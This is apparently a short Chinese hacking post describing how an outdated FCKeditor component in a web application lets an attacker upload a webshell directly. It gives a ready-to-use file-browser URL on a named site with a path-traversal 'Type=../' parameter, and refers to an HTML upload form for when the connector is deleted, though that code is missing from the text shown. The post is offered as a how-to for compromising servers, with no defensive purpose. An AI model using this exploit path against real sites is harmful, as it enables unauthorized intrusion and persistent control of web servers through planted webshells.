这套程序用的人还是挺多的,公布的漏洞也少,但是fckeditor的漏洞很多。
这套程序用的还是比较老的版本fckeditor.可以直接上传webshell。连IIS
解析漏洞多省了。
测试如下:
http://www.tmdsb.com/controls/fckeditor/editor/filemanager/browser/default/browser.html?Type=../&COnnector=connectors/aspx/connector.aspx |
要是connector.aspx被删的话。可用以下代码。
|
把上面代码保存成test.html就可以直接上传sehll了。